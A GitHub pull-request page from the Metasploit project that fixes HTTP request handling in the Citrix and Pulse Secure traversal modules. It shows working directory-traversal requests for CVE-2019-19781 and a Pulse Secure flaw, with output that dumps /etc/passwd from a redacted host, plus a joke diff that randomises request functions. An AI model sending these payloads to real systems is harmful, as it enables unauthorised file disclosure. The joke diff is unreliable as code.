Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fix #12813, prefer send_request_cgi over send_request_raw #12820

Merged
merged 2 commits into from Jan 14, 2020

Conversation

@wvu-r7
Copy link
Contributor

wvu-r7 commented Jan 14, 2020

Fixes #12813 and more specifically #12816 (comment). The only tradition is CHAOS.

msf5 auxiliary(scanner/http/citrix_dir_traversal) > run

********************
####################
# Request:
####################
GET /vpn/../vpns/cfg/smb.conf HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.1 200 OK
Date: Tue, 14 Jan 2020 06:40:03 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 12 Jan 2020 22:27:43 GMT
ETag: "53-59bf8de0ad5c0"
Accept-Ranges: bytes
Content-Length: 83
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: text/plain; charset=UTF-8

[global]
	encrypt passwords = yes
	name resolve order = lmhosts wins host bcast

[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/citrix_dir_traversal) >
msf5 auxiliary(gather/pulse_secure_file_disclosure) > run
[*] Running module against [redacted]

[*] Running in manual mode
[*] Dumping /etc/passwd
********************
####################
# Request:
####################
GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: max-age=86400, must-revalidate
Last-Modified: Mon, 09 Sep 2019 15:10:05 GMT
Content-Length: 273
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000

root:x:0:0:root:/:/bin/bash
nfast:x:0:0:nfast:/:/bin/bash
bin:x:1:1:bin:/:
nobody:x:99:99:Nobody:/:
dns:x:98:98:DNS:/:
term:x:97:97:Telnet/SSH:/:
web80:x:96:96:Port 80 web:/:
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
postgres:x:102:102:PostgreSQL User:/:

root:x:0:0:root:/:/bin/bash
nfast:x:0:0:nfast:/:/bin/bash
bin:x:1:1:bin:/:
nobody:x:99:99:Nobody:/:
dns:x:98:98:DNS:/:
term:x:97:97:Telnet/SSH:/:
web80:x:96:96:Port 80 web:/:
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
postgres:x:102:102:PostgreSQL User:/:

[+] /Users/wvu/.msf4/loot/20200114004238_default_[redacted]_PulseSecureVPN_774075.bin
[*] Auxiliary module execution completed
msf5 auxiliary(gather/pulse_secure_file_disclosure) >

Note the only difference is Content-Type: application/x-www-form-urlencoded, and it isn't an issue for these vulns.

wvu-r7 added 2 commits Jan 14, 2020
Since I bypassed query/vars_get, send_request_cgi is fine now.
@wvu-r7 wvu-r7 self-assigned this Jan 14, 2020
wvu-r7 added a commit that referenced this pull request Jan 14, 2020
@wvu-r7 wvu-r7 merged commit 002fe64 into rapid7:master Jan 14, 2020
1 of 3 checks passed
1 of 3 checks passed
Metasploit Automation - Sanity Test Execution Running automation sanity tests. Details available on completion.
Details
continuous-integration/travis-ci/pr The Travis CI build is in progress
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
@wvu-r7 wvu-r7 deleted the wvu-r7:bug/citrix branch Jan 14, 2020
@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Jan 14, 2020

The only tradition is CHAOS.

diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb
index 3bcec88e4a..364a84ec94 100644
--- a/lib/msf/core/exploit/http/client.rb
+++ b/lib/msf/core/exploit/http/client.rb
@@ -308,7 +308,7 @@ module Exploit::Remote::HttpClient
   #
   # Passes +opts+ through directly to Rex::Proto::Http::Client#request_raw.
   #
-  def send_request_raw(opts={}, timeout = 20, disconnect = false)
+  def send_request_raw2(opts={}, timeout = 20, disconnect = false)
     if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
       actual_timeout = datastore['HttpClientTimeout']
     else
@@ -354,6 +354,21 @@ module Exploit::Remote::HttpClient
     end
   end
 
+  def send_request_cgi(opts={}, timeout = 20, disconnect = true)
+    if [true, false].sample
+      send_request_raw2(opts, timeout, disconnect)
+    else
+      send_request_cgi2(opts, timeout, disconnect)
+    end
+  end
+
+  def send_request_raw(opts={}, timeout = 20, disconnect = true)
+    if [true, false].sample
+      send_request_raw2(opts, timeout, disconnect)
+    else
+      send_request_cgi2(opts, timeout, disconnect)
+    end
+  end
 
   # Connects to the server, creates a request, sends the request,
   # reads the response
@@ -361,7 +376,7 @@ module Exploit::Remote::HttpClient
   # Passes `opts` through directly to {Rex::Proto::Http::Client#request_cgi}.
   #
   # @return (see Rex::Proto::Http::Client#send_recv))
-  def send_request_cgi(opts={}, timeout = 20, disconnect = true)
+  def send_request_cgi2(opts={}, timeout = 20, disconnect = true)
     if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
       actual_timeout = datastore['HttpClientTimeout']
     else
@wvu-r7

This comment has been minimized.

Copy link
Contributor Author

wvu-r7 commented Jan 14, 2020

APPROVED.

msjenkins-r7 added a commit that referenced this pull request Jan 14, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
2 participants
You can’t perform that action at this time.